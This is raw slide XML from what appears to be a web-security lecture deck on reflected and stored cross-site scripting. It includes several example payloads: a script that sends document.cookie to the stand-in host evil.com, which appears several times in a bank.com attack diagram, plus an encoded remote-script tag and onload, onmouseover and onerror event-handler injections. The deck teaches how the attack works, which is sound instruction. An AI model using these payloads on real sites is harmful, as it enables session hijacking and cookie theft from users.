            <a:off x="7302212"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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163113" y="2537546"/>
            <a:ext cx="2223761" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User accesses malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="723517" y="2759074"/>
            <a:ext cx="2851505" cy="1049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flipV="1">
            <a:off x="745667" y="3937266"/>
            <a:ext cx="7313319" cy="10500"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610722" y="2749066"/>
            <a:ext cx="9204873" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>doc.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> + “ /&gt;”);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>&lt;/script&gt;’ /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7839798" y="1509631"/>
            <a:ext cx="936273" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3407663" y="1452964"/>
            <a:ext cx="745742" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="764220" y="3562069"/>
            <a:ext cx="7294766" cy="183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7" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648116" y="3297814"/>
            <a:ext cx="6225683" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>GET &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>doc.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> + “ /&gt;”);&lt;/script&gt;’ /&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="serve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415" y="1786630"/>
            <a:ext cx="665731" cy="807059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3410719" y="1804771"/>
            <a:ext cx="1083402" cy="701705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2967778" y="1786629"/>
            <a:ext cx="629394" cy="728773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47962" y="1861958"/>
            <a:ext cx="1030029" cy="667136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="735573" y="3026065"/>
            <a:ext cx="2851505" cy="10499"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647732" y="3669816"/>
            <a:ext cx="7411254" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>&lt;b&gt;File not found: &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>doc.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> + “ /&gt;”);&lt;/script&gt;’ /&gt;&lt;/b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745667" y="4093414"/>
            <a:ext cx="2945112" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>GET /SESSIONID=187362871872991741 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="770878" y="4353373"/>
            <a:ext cx="2851505" cy="1049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67530259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Stored Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting can also be performed as a two-step attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First the JavaScript code is stored by the attacker as part of a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the victim downloads and executes the code when a page containing the attacker’s input is viewed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any web site that stores user content without sanitization, is vulnerable to this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bulletin board systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346646315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Executing JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript can be executed and encoded in many different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoded: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%3cscript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=http://www.example.com/malicious-code.js%3e%3c/script%3e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event handlers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>alert(’XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>alert(’XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>')&gt;click me!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>url.to.file.which/not.exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
